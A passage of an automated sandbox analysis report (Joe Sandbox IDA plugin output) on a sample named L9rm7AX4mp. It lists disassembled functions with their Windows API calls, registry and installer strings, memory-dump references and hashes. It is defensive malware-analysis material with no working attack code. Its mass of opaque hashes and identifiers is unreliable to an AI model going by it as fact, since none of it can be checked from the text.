                                                                                                      • Opcode ID: 3cb25ddd520bb7346a311bd12df13eef30655657fdbd9206c6de24d758997ec8
                                                                                                      • Instruction ID: fcbeb811eea92760dd82faa40bdacdd366465f8a5342b7af386d3ee3900427bd
                                                                                                      • Opcode Fuzzy Hash: 3cb25ddd520bb7346a311bd12df13eef30655657fdbd9206c6de24d758997ec8
                                                                                                      • Instruction Fuzzy Hash: 5A213375A00208ABDB01EFA1C8429DEB7B9EB48305F50457BE801B7342DA789F058AA5
                                                                                                      Function 0047C310 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36registryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C596,00000000,0047C5AC,?,?,?,?,00000000), ref: 0047C372
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Close
                                                                                                      • String ID: RegisteredOrganization$RegisteredOwner
                                                                                                      • API String ID: 3535843008-1113070880
                                                                                                      • Opcode ID: 3cef9cafc9ae7832fbb6eaa2bd4d40f0f71bbb09bcea78efdfdb807f20eb42b3
                                                                                                      • Instruction ID: cd6b81515cbcb541a42d20c803a6709c30f964b406f28b15d8fe69fce277d2ff
                                                                                                      • Opcode Fuzzy Hash: 3cef9cafc9ae7832fbb6eaa2bd4d40f0f71bbb09bcea78efdfdb807f20eb42b3
                                                                                                      • Instruction Fuzzy Hash: 41F09030704204ABEB00D669ECD2BAA33A99746304F60C03FA9088B392D6799E01CB5C
                                                                                                      Function 004754BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,004756F3), ref: 004754E1
                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,004756F3), ref: 004754F8
                                                                                                        • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateErrorFileHandleLast
                                                                                                      • String ID: CreateFile
                                                                                                      • API String ID: 2528220319-823142352
                                                                                                      • Opcode ID: fa36eb7f5e292efbad873286b983b31a245b5f10299435e2a562660d120c4ecb
                                                                                                      • Instruction ID: 40e201e46ebb19b1d9bf90fbf766f72b309683208074062896c4944ddf319cda
                                                                                                      • Opcode Fuzzy Hash: fa36eb7f5e292efbad873286b983b31a245b5f10299435e2a562660d120c4ecb
                                                                                                      • Instruction Fuzzy Hash: CDE065702403447FDA10F769CCC6F4577889B14729F10C155B5446F3D2C5B9EC408628
                                                                                                      Function 0042DE2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18registryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Open
                                                                                                      • String ID: System\CurrentControlSet\Control\Windows$c6H
                                                                                                      • API String ID: 71445658-1548894351
                                                                                                      • Opcode ID: 532c08fc3a5ebe879a42036bede715a90f251433598981f36561c2967c82051c
                                                                                                      • Instruction ID: b14c86e398362f8621ba381b59967aff518ca924b2daa5b46ce173f8349262a2
                                                                                                      • Opcode Fuzzy Hash: 532c08fc3a5ebe879a42036bede715a90f251433598981f36561c2967c82051c
                                                                                                      • Instruction Fuzzy Hash: BFD0C772950128BBDB00DA89DC41DFB775DDB15760F45441BFD049B141C1B4EC5197F8
                                                                                                      Function 00456EEC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 00456E7C: CoInitialize.OLE32(00000000), ref: 00456E82
                                                                                                        • Part of subcall function 0042E3A4: SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
                                                                                                        • Part of subcall function 0042E3A4: LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
                                                                                                      • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 00456F10
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                                                      • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                                                      • API String ID: 2906209438-2320870614
                                                                                                      • Opcode ID: 22a7af04fdfb7e1cbc8590484576be710a33bf4538556d1874791685a96bf942
                                                                                                      • Instruction ID: 6d1f0b9ea2f83cf17b9d56af39d37ffc4890966232cc80b75afa5f9be50b51f8
                                                                                                      • Opcode Fuzzy Hash: 22a7af04fdfb7e1cbc8590484576be710a33bf4538556d1874791685a96bf942
                                                                                                      • Instruction Fuzzy Hash: 97C04CA1B4169096CB00B7FAA54361F2414DB5075FB96C07FBD40BB687CE7D8848AA2E
                                                                                                      Function 0046D098 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042E3A4: SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
                                                                                                        • Part of subcall function 0042E3A4: LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
                                                                                                      • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046D0AD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressErrorLibraryLoadModeProc
                                                                                                      • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                                      • API String ID: 2492108670-2683653824
                                                                                                      • Opcode ID: 4bfb7ae62aec4cae49a8b0683f2b36ac3bef8159a448d5ae1ca26c94081968f3
                                                                                                      • Instruction ID: 608de25eae135e4754017d8cf95b07e3007941af04aa8fd5541e4ba3120ba520
                                                                                                      • Opcode Fuzzy Hash: 4bfb7ae62aec4cae49a8b0683f2b36ac3bef8159a448d5ae1ca26c94081968f3
                                                                                                      • Instruction Fuzzy Hash: 69B092E0F056008ACF00A7F6984260A10059B8071DF90807B7440BB395EA3E840AAB6F
                                                                                                      Function 0044853C Relevance: 4.7, APIs: 3, Instructions: 151libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448719), ref: 0044865C
                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004486DD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                      • String ID:
                                                                                                      • API String ID: 2574300362-0
                                                                                                      • Opcode ID: 9e6f6b39164a2250cf52a4aeb4930d02d61dfc433358958cd5631fa5a9f36d71
                                                                                                      • Instruction ID: bcb50df029510264ac3c8269deb9aca16d778d72fab4f9fb4f479d94b6d7f3fe
                                                                                                      • Opcode Fuzzy Hash: 9e6f6b39164a2250cf52a4aeb4930d02d61dfc433358958cd5631fa5a9f36d71
                                                                                                      • Instruction Fuzzy Hash: 09514170A00105AFDB40EFA5C491A9EBBF9EB54315F11817EA414BB392DA389E05CB99
                                                                                                      Function 00481704 Relevance: 4.6, APIs: 3, Instructions: 98windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetSystemMenu.USER32(00000000,00000000,00000000,0048183C), ref: 004817D4
                                                                                                      • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 004817E5
                                                                                                      • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 004817FD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Append$System
                                                                                                      • String ID:
                                                                                                      • API String ID: 1489644407-0
                                                                                                      • Opcode ID: 700b5811d02ba2ff172c742152fb081413fabfeab2321fa183ac7a2ab913d185
                                                                                                      • Instruction ID: b36482c1273671328963914ac1a7ecaae55131090c894365c145815d0470a156
                                                                                                      • Opcode Fuzzy Hash: 700b5811d02ba2ff172c742152fb081413fabfeab2321fa183ac7a2ab913d185
                                                                                                      • Instruction Fuzzy Hash: 02318E307043445AD721FB359D82BAE3A989B15318F54593FB900AA3E3CA7C9C4A87AD
                                                                                                      Function 004524FC Relevance: 4.6, APIs: 3, Instructions: 75COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • 74D31520.VERSION(00000000,?,?,?,004972D0), ref: 0045251C
                                                                                                      • 74D31500.VERSION(00000000,?,00000000,?,00000000,00452597,?,00000000,?,?,?,004972D0), ref: 00452549
                                                                                                      • 74D31540.VERSION(?,004525C0,?,?,00000000,?,00000000,?,00000000,00452597,?,00000000,?,?,?,004972D0), ref: 00452563
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: D31500D31520D31540
                                                                                                      • String ID:
                                                                                                      • API String ID: 1003763464-0
                                                                                                      • Opcode ID: 386d1b7d14527d93b72562f1672999fd2f5aa3ff7ed0da5cad2ac492ae89063e
                                                                                                      • Instruction ID: b47a7e64509d5cca070909842564d4f4e78a1d1ae8fea26b0cdd83eea50adb12
                                                                                                      • Opcode Fuzzy Hash: 386d1b7d14527d93b72562f1672999fd2f5aa3ff7ed0da5cad2ac492ae89063e
                                                                                                      • Instruction Fuzzy Hash: 6B218371A00148AFDB01DAA989519AFB7FCEB4A300F55447BFC00E3342E6B99E04CB65
                                                                                                      Function 0042440C Relevance: 4.6, APIs: 3, Instructions: 59windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424422
                                                                                                      • TranslateMessage.USER32(?), ref: 0042449F
                                                                                                      • DispatchMessageA.USER32(?), ref: 004244A9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message$DispatchPeekTranslate
                                                                                                      • String ID:
                                                                                                      • API String ID: 4217535847-0
                                                                                                      • Opcode ID: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                                                                      • Instruction ID: 520fb342982be2dd3794930026bb259c1cd38a4fe19eb968f01b3c53081bdda3
                                                                                                      • Opcode Fuzzy Hash: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                                                                      • Instruction Fuzzy Hash: 781191307043205AEE20FA64AD41B9B73D4DFD1708F80481EF9D997382D77D9E49879A
                                                                                                      Function 00416654 Relevance: 4.5, APIs: 3, Instructions: 39COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SetPropA.USER32(00000000,00000000), ref: 0041667A
                                                                                                      • SetPropA.USER32(00000000,00000000), ref: 0041668F
                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166B6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Prop$Window
                                                                                                      • String ID:
                                                                                                      • API String ID: 3363284559-0
                                                                                                      • Opcode ID: c3da473eafe02ab8e789e0609dcd6af1eaad0cb973784c7fd29191cc4dc7f6ad
                                                                                                      • Instruction ID: 2262f6f032fbfc8c948eb6af5e1566575da4c35a9ecfa624f63ddadf83d7b404
                                                                                                      • Opcode Fuzzy Hash: c3da473eafe02ab8e789e0609dcd6af1eaad0cb973784c7fd29191cc4dc7f6ad
                                                                                                      • Instruction Fuzzy Hash: E3F0B271701210ABD710AB599C85FA632DCAB09719F160176BD09EF286C778DC40C7A8
                                                                                                      Function 0041EE64 Relevance: 4.5, APIs: 3, Instructions: 27windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • IsWindowVisible.USER32(?), ref: 0041EE74
                                                                                                      • IsWindowEnabled.USER32(?), ref: 0041EE7E
                                                                                                      • EnableWindow.USER32(?,00000000), ref: 0041EEA4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$EnableEnabledVisible
                                                                                                      • String ID:
                                                                                                      • API String ID: 3234591441-0
                                                                                                      • Opcode ID: 8d68ea6b8e39d06ec6ae2b778d87487b924e250a5b1b44c5d2ba2f9a93d60018
                                                                                                      • Instruction ID: eab114e884733e02e348d5fb54c1eeaedaab2d2a8f53f62e6f3f1b5b82b3488b
                                                                                                      • Opcode Fuzzy Hash: 8d68ea6b8e39d06ec6ae2b778d87487b924e250a5b1b44c5d2ba2f9a93d60018
                                                                                                      • Instruction Fuzzy Hash: 90E0EDB9100300AAE711AB2BEC81A57769CBB94314F45843BAC099B293DA3EDC409B78
                                                                                                      Function 0046A26C Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 229COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SetActiveWindow.USER32(?), ref: 0046A378
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ActiveWindow
                                                                                                      • String ID: PrepareToInstall
                                                                                                      • API String ID: 2558294473-1101760603
                                                                                                      • Opcode ID: 2f09c314b6fb54b1472f2c84d4998d1c671ccdc982530a6e1a6c91392ff97de1
                                                                                                      • Instruction ID: 163d609461ff3b9580316b21a780dec1cd9204125e937a74b025edb926540d27
                                                                                                      • Opcode Fuzzy Hash: 2f09c314b6fb54b1472f2c84d4998d1c671ccdc982530a6e1a6c91392ff97de1
                                                                                                      • Instruction Fuzzy Hash: 90A10A34A00109DFCB00EB99D985EEEB7F5AF88304F1580B6E404AB362D738AE45DF59
                                                                                                      Function 0046C764 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 209COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: /:*?"<>|
                                                                                                      • API String ID: 0-4078764451
                                                                                                      • Opcode ID: daa5e4ec58dfd3a4f8b67407405db92af73f638a584e66193a323fc2660a566c
                                                                                                      • Instruction ID: b706238f5af82f8a54f925a22e06db4ee79b372672e861a4edd763b161806009
                                                                                                      • Opcode Fuzzy Hash: daa5e4ec58dfd3a4f8b67407405db92af73f638a584e66193a323fc2660a566c
                                                                                                      • Instruction Fuzzy Hash: 6F7197B0B44244AADB20E766DCC2BEE77A19F41704F108167F5807B392E7B99D45878E
                                                                                                      Function 00482050 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SetActiveWindow.USER32(?), ref: 004820FE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ActiveWindow
                                                                                                      • String ID: InitializeWizard
                                                                                                      • API String ID: 2558294473-2356795471
                                                                                                      • Opcode ID: 4cb1695e49b1b07e3586b425a713be07569947560fbf0fba233168fdeef3d44e
                                                                                                      • Instruction ID: b8891c381381d1a0014b65a4ce29d1dfbbdf9d421e77ac889de6892087eb3363
                                                                                                      • Opcode Fuzzy Hash: 4cb1695e49b1b07e3586b425a713be07569947560fbf0fba233168fdeef3d44e
                                                                                                      • Instruction Fuzzy Hash: BE118234205204DFD711EBA5FE96B2977E4EB55314F20143BE5008B3A1DA796C50CB6D
                                                                                                      Function 0047C22C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39registryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047C472,00000000,0047C5AC), ref: 0047C271
                                                                                                      Strings
                                                                                                      • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047C241
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpen
                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                                                      • API String ID: 47109696-1019749484
                                                                                                      • Opcode ID: 6e2d5090e95b4c6fabdd9168d7cad944b3593745ae6ad0b3bb6d2af319e0c910
                                                                                                      • Instruction ID: 70811ca8e083c9a3dbfae153db117623eb743e792d78c4ccda021ebaf15ccddc
                                                                                                      • Opcode Fuzzy Hash: 6e2d5090e95b4c6fabdd9168d7cad944b3593745ae6ad0b3bb6d2af319e0c910
                                                                                                      • Instruction Fuzzy Hash: 8EF08931B0411467DA00A5DA5C82B9E56DD8B55758F20407FF508EB253D9B99D02036C
